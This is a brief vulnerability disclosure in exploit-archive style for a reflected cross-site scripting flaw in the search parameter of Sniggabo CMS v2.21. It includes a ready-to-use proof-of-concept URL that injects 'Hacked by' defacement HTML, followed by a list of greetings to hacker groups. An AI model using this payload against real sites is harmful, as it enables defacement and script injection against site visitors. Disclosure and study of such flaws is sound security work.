# Exploit Title: Sniggabo CMS v2.21 Cross Site Scripting Vulnerability
# Date: January 6th, 2010
# Author: Sora
# Version: v2.21
# Tested on: Windows Vista Home Premium and Linux 2.6.32

—————————————-
> Sniggabo CMS v2.21 Cross Site Scripting Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/
> Google Dork: “In your dreams, script kiddies.”

# Description:
Sniggabo CMS v2.21 suffers a cross site scripting vulnerability in the parameter
‘q’ of search.php.

# PoC: http://www.site.com/search.php?q=%3Ch1%3EHacked%20by%20Sora%20-%20vhr95zw%20[at]%20hotmail%20[dot]%20com%3C/h1%3E%3Chr%3Eh4×3d%20-%20http://greyhathackers.wordpress.com/%3Cbr%3E&site=www.google.ca

# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes # Mafia Boyz DZ Crew # 原点 # cyber-sec.org # greyhathackers.wordpress.com # incursioexsubter.info #